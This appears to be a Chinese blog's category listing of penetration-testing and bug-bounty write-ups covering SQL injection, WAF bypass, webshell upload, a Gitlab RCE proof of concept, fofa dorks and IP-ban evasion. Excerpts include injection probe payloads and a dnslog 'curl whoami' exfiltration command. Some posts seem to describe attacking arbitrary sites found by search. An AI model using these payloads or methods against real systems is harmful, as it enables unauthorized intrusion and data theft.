![](https://img-blog.csdnimg.cn/20190918140012416.png?x-oss-process=image/resize,m_fixed,h_224,w_224)
web
文章平均质量分 62
web
ECHO::
这个作者很懒,什么都没留下…
展开
-
Apache-log4j2 日志组件-触发点位置
Apache-log4j2 日志组件 组件存在的触发点位置原创 2022-08-29 19:19:11 · 427 阅读 · 1 评论 -
实战| 记一次shiro序列化到接管服务器
shiro 序列化原创 2022-08-17 19:26:16 · 1268 阅读 · 0 评论 -
实战 || 某web厂商通用漏洞挖掘后续
实战 || 某软件股份有限公司通用漏洞挖掘原创 2022-08-05 17:58:43 · 966 阅读 · 0 评论 -
应急响应全栈
应急响应全栈原创 2022-07-25 00:04:04 · 2459 阅读 · 3 评论 -
实战|记一次攻防演练打点
记一次攻防演练打点原创 2022-07-24 23:59:01 · 602 阅读 · 0 评论 -
原创|记一次高校漏洞挖掘
原创| 记一次高校漏洞挖掘原创 2022-07-24 23:52:14 · 1963 阅读 · 0 评论 -
原创 | ueditor1.4.3-asmx绕过waf
ueditor1.4.3-asmx绕过waf原创 2022-07-24 23:21:26 · 2050 阅读 · 0 评论 -
记一次可怜的150元RCE平安Src挖掘
某次平安src,搞活动双倍奖励原创 2022-06-05 21:15:07 · 1652 阅读 · 3 评论 -
记一次团队成员绕过waf来cms报错注入
记一次团队成员绕过waf来cms报错注入 作者:ECHO:前言: 最近事多,随便抽个来写写,团队的某个大哥要打hvv,丢了个mssql的站,说是有waf,想搞搞数据和shell无图,通过fuzz,发现逻辑运算1-if()这种是可以用的,, 但不知道sql语句怎么构造,,在后面加了一堆语句后,报了个insert语句的错,后面就丢给up哥来闭合了,ok,成功闭合,闭合语句:a’,1,1,1,1)–+ 能注了,up哥yyds!然后就是:Payload三个探针: 不用conv原创 2022-05-30 11:19:05 · 677 阅读 · 0 评论 -
有手就行系列-一周拿下4个Edu证书站
有手就行系列-一周拿下4个Edu证书站 作者ECHO:前言:最近事情有点多,原本初心是两周一篇文,现在远远超时间了,主要写文章很麻烦,有时候一句话说清楚,但要去解释清楚,时间花在解释上了。前段时间打了几个证书站,打出了四个证书,,来水个笔记0x01.某电科大弱口令已经修复了,就发出来了,电科大的站不知道被多少大佬摸过了,,打过一些站,看到有登录的地方就有几率出洞,我都会去看看,能不能进去一种说法,起码外网不是那种恶心人的僵尸站群。很标准的UI设计啊,主站的管理web果然原创 2022-05-16 22:34:35 · 1544 阅读 · 2 评论 -
SRC-edu 信息泄露快速刷分上分拓扑思路
最近和很多群里大佬一块挖edu,企业,学到了很多东西,,单刷信息泄露刷到了月榜前10,原创 2022-04-21 18:11:26 · 6761 阅读 · 5 评论 -
4.10.业务逻辑漏洞笔记-某高校公众号任意文件上传加上未授权接口注入
4.10.业务逻辑漏洞笔记--某高校未授权注入+任意文件上传原创 2022-04-10 19:01:06 · 3137 阅读 · 0 评论 -
4.09.业务逻辑漏洞笔记-某高校外网资产前端验证
前言: 首先呢,写这些东西,都是为了记录平时挖逻辑的日常,,我注重于第一视角,平时怎么学的这些漏洞,实战怎么碰到怎么去思考? 不一定得有成果,不喜勿喷,谢谢理解。。信息收集:这次没收集到学号,SFZ,手机号等信息,,打不了学工系统,,只能打打外网资产,,找到一处直播系统。然后看到数据包请求这个接口地址; 发现短信发送成功了,,看出他发短信的逻辑是先不校验是否存在该用户,,发了短信后在检验。通过他的js包看到,,重置密码只要有一个code值为1,就能绕过验证,然后尝试看看能不能原创 2022-04-09 09:40:52 · 3005 阅读 · 0 评论 -
记一次安服测试遇到Hibernate HQL注入
偶然,,遇到Hibernate HQL注入原创 2022-04-06 21:07:58 · 4888 阅读 · 0 评论 -
实战| 安服仔用一毛钱维修台伊拉克成色笔记本(下)
实战 安服仔用一毛钱维修台伊拉克成色笔记本(下)原创 2022-03-25 15:34:08 · 1041 阅读 · 0 评论 -
实战 安服仔用一毛钱维修台伊拉克成色笔记本(中)
实战 安服仔用一毛钱维修台伊拉克成色笔记本(中)原创 2022-03-25 15:30:20 · 521 阅读 · 0 评论 -
实战 | 安服仔用一毛钱维修台伊拉克成色笔记本(上)
实战 | 安服仔用一毛钱维修台伊拉克成色笔记本(上)原创 2022-03-25 15:28:25 · 558 阅读 · 0 评论 -
实战-看我如何用python批量提交100+shell的
实战漏洞挖掘-python脚本批量化,日入100+漏洞提交原创 2022-03-06 18:47:15 · 4750 阅读 · 0 评论 -
Qaseem安全团队- 躺着挖洞之awvs批量扫描联动xray
坐在家里躺着等漏洞上门原创 2022-01-30 19:42:38 · 4609 阅读 · 0 评论 -
实战-记一次edu证书站梅开三度 (上)
一文看懂我是如何挖洞edu证书站的rce的?原创 2022-01-19 23:21:33 · 4256 阅读 · 0 评论 -
Qaseem安全团队- 云函数搭建高质量代理池
Qaseem安全团队- 云函数搭建高质量代理池挖掘src或渗透经常碰到waf或者服务器策略ban了ip的情况,很影响挖洞的节奏,最近朋友给推了云函数搭建代理池的思路,确实挺好用,白嫖云函数。云函数(Serverless Cloud Function,SCF)是云计算厂商为企业和开发者们提供的无服务器执行环境,可在无需购买和管理服务器的情况下运行代码,云函数存在非常多的出口ip,我们要做的把http请求转发到云函数提供的api上,![]1.登录腾讯云,搜索云函数,然后自定义一个项目,具体可以看这位哥原创 2022-01-16 11:30:23 · 5037 阅读 · 2 评论 -
实战 -- 记一次src小组定向挖掘
实战 - 记一次src小组定向挖掘原创 2022-01-03 09:04:00 · 2014 阅读 · 1 评论 -
实战渗透浅谈--记一次傀儡注入工具到Getshell
时间: 2020-04 这是当时拿到第一个WEBSHELL,自己摸导出来的,思路比较简单,没有防护,,1.掏出傀儡注入工具,(确实这一款工具比较牛逼,,)2.拿出pangolin,找到某后台注入(现在这些自动化工具需要改改才能用了)3站点没有防护(直接Dump出 admin和hash)4.通过御剑/dirsearch等工具探测到后台路径为/login.php(估计是个废站)5.登录后台,看到没啥功能点,锁定在logo处,5.发现头像处没有做上传类型过滤,burp更改后缀6.访问发原创 2021-12-25 19:00:21 · 1299 阅读 · 0 评论 -
HACK学习黑帽子Python--Gitlab远程代码执行(CVE-2021-22205)脚本构造Poc
前言: 作为一名白帽,写脚本能快速的在挖洞过程中快速的批量验证。为了让笔记更有实用性,这里以poc的形式:Gitlab由于文件解析器对上传的dvju格式的jpg文件校验不严,导致远程代码执行RCE,Poc利用链:01.获取"/users/sign_in"页面的session,得到返回包的X-CSRF-Token,02.利用’X-CSRF-Token’ 请求"/uploads/user" 上传页面,03.构造带有dnslog命令的poc图片 dnglog_cmd = "curl whoami.xX原创 2021-12-06 10:32:15 · 1558 阅读 · 0 评论 -
实战渗透浅谈--一次巧合偶然的sql注入
一直以来,都想摆脱sqlmap的束缚,通过自定义脚本来完成,–前言某月某天,挖盒子过程中,burpsuite扫出某个sqli,花了点时间测了下,确实有些搞头。是一个from子查询payload,select*from(select sleep(10))a ,from会把后面的结果(在这里是子查询)当作单表来查询,发包后,burpsuite返回包1154millls,存在sql注入,,不知道有多久没手工注入了,放sqlmap看能不能跑点数据出来如图,referer注入设置level 3 ,time-原创 2021-11-30 15:51:12 · 5296 阅读 · 3 评论 -
HACK学习黑帽子Python--漏洞检测脚本快速编写
前言: 作为一名白帽,写脚本能快速的在挖洞过程中快速的批量验证。为了让笔记更有实用性,这里以poc的形式:01.如何发送HTTP请求GET型: 01.有表单参数 request.get(url=url,params={}) params可以先用payload={‘username’:‘admin’}先代替然后 params=payload02.requests.get(url)POST型: 01.request.post(url,params={}),params同上02.requests原创 2021-11-15 11:02:56 · 2750 阅读 · 1 评论 -
白帽子挖洞第IV篇作业--谈谈xray与awvs联动笔记
xray在2021年11月更新到了1.8,由于之前的1.7已经被crack,这里环境就用1.7一:xray的相关命令xray的核心命令01代理被动扫描(重点)xray.exe webscan --listen 127.0.0.1:7777 --html-output xx.html02.爬虫扫描(不建议)xray.exe --basic-crawler http://example.com03.指定插件扫描–plugins xss,cmd_injection加载本地 /xxx/ 目录所原创 2021-11-05 21:11:29 · 887 阅读 · 2 评论 -
白帽子挖洞作业第V篇作业--那些实用挖洞fofa语句总结
fofa信息收集:fofa支持搜索http头部的内容 二次过滤 比如配合host进一步筛选漏洞主机host=".edu.cn" && header=“apache”fofa支持搜索html正文的内容 ,比如 xxx公司 配合host可以找出某个机构or学校的包含xx公司漏洞资产。或者直接xxx公司批量0day,host=".edu.cn" && body=“xxx公司” or host=".edu.cn" && body="/admin/原创 2021-11-03 11:33:49 · 735 阅读 · 0 评论 -
实战渗透-记一次文件上传拿到aspx站点(1)
这两天实在有些忙,,前段时间拿到的某个SHELL,今天打算放放,接着挖信息泄露站点大概是这样的,,http://ABC.xxxx.xxx.cn/HxxQxx/login 登录地址登录后台后,拿到后台管理权限找到两个上传点1.植物处的一处文件上传2.新闻管理的一处上传,在第一处上传附件是保存为图片,,burp抓包看到解析的内容有些多,抓包改包结果没成功,第二处上传附件从站点首页看到有docx,excel等类型,,这个地方大概率能传马抓包的时候有safedog-flow-item字段,,传原创 2021-09-01 08:52:47 · 589 阅读 · 1 评论 -
实战渗透-shark2注入工具盲注实战--10分钟内拿到管理后台
这段时间开始做php审计了,基础不是很好,觉得很烦闷,谷歌找了个站练关键字:inurl:Abc.php?id=进入这页面看到没有排版,想到可能编辑器不好用or 管理员水平一半;做sql注入流程:1.先数字后字符,, ?id=abc-1 发现页面发生变化,图片改了,直接得出结论这里有sql注入,数字型的。2.进行 And(1=1) And(1=2) ||(1=1) ||(1=2)&&(1=1) &&(1=2) 这四种尝试?id=abc||(1=1) 页面发原创 2021-08-01 17:59:15 · 600 阅读 · 0 评论 -
通过shark2注入从黑盒的角度审计SQLI-LESS
作为一名有情怀的网安从事者,见识过以前11-14年的网安风气;也见识过现在的网安风气,大家都在相互抄,相互转,但是网安本身就是门玄学,格局和心态最重要。这里用less26为例子,首先我们假设目标服务器没有cdn和参数过滤机制,在id=1后加’ 或者 or " 页面不正常,但我们要把他可能是数字型考虑进去,准备的payload :?id=1+1 ?id=2-1?id=1%0Aand(1=1)?id=-1/**/||(1=2) 如果这里能跑,就能得到1.能做关键词盲注,注入符能用同时原创 2021-07-30 09:01:02 · 198 阅读 · 0 评论 -
shark2注入工具--灰盒盲注
写这篇笔录就一个目的: 过段时间盲注用的到。从shark2 那里学到or注入的手法:由于那款注入工具做标记取得都是 and 1=1 或者1=1但是,在某些情景,比如POST型 搜索型。。。。。where content like ‘%a%’ and ‘%’=’%'and后是我们构造闭合后面的%的语句,如果用来做标记,那跑都跑不起来。。。。。where content like ‘%a%’ and 1=1 and ‘%’=’%'多加个and 1=1 ,页面正常,就可做注入标记。。or手原创 2021-07-27 23:18:15 · 229 阅读 · 0 评论 -
shark2注入工具-盲注靶机练习
shark2 开发的SuperInjection 工具,是window视窗版的,觉得比sqlmap黑黑的命令行更友好。这里做靶机的盲注练习,为的是过段时间渗透用的顺手。用的环境: sqli-8关键字:You are in按作者的文档所说:先编码,在做payload标记,如图可是呢?这是盲注,需要设置关键词来区分T和F,这里很明显关键词就是You Are In完全没有识别出正常页面的关键词通过发包,可以看到payload一切正常,response里存在关键字但不能识别关键词,原创 2021-07-27 16:20:24 · 217 阅读 · 0 评论 -
实战渗透-一次拿到webshell后艰难的提权
记上一篇,拿到webhshell后,数据库是dba,本地上传一个cmd.exe组件上去后,执行失败网上很多说改路径,写的也写不明白,想到之前迪哥用过的大马提权,环境是php,但支持asp,有iis组件,发现 D://recycle可写,传一个cmd.com组件执行命令权限真的很小,是 nt service 网络用户权限,ns的权限是不能执行net的支持的组件,提权的时候用的找 =====================查看systeminfo,发现有200多个补丁,准备打溢出,目标机是可以原创 2021-07-25 13:32:51 · 2073 阅读 · 1 评论 -
实战渗透-一次曲折的拿webshell实战
几天前,逛论坛,看见某佬哥找了某个学校的sql注入点,,注入点在查询页面的url参数上,当时觉得很新奇,觉得这个注入点很奇特,后来想继续研究,谷歌找了找吧这个站找了出来这里为了安全,参数用 ?abc=cx代替 ,在cx’后报错,按原作者的意思,测出来过滤了逗号,联合查询 cx’ union select 1,2,3,4,5,6,7,8,9,10,11%23 成了1234567891011.。这里用join手法拼接注入,union select 1,2==union select from (s原创 2021-07-25 11:12:40 · 688 阅读 · 6 评论 -
渗透环境篇--everything检索工具使用
挖洞的时候,找文件,今天看了某大佬的操作,推荐everything检索,速度块。下载链接:https://www.voidtools.com/zh-cn/原创 2021-06-29 19:37:34 · 175 阅读 · 0 评论 -
挖掘厂商SRC-记一次某OA在线登录洞edu不认账
全文小结1.首先洞没刷到肯定不舒服的,但这种就是比消息,谁拿到的消息快,谁刷的早,就有分,晚的就重复。(好几个3号凌晨通宵刷,我的妈)2. 向这种在线洞,本地复现材料edu不认。好之为之,40个洞一个没过。3. 3. fofa找到资产挺多的,但不全,起码有3成不在里面。4. 4.自己审洞吧,没事别折腾,空欢喜一场。。3/3号一天早上,需要提早上课,懒洋洋来到教室。刷刷公众号,看到一个眼前一亮的文章: 某OA系统在线登录漏洞,一看时间是刚发的,突然想起我那可怜的edu rank,感觉这个洞有点说法。想原创 2021-03-04 16:31:18 · 461 阅读 · 3 评论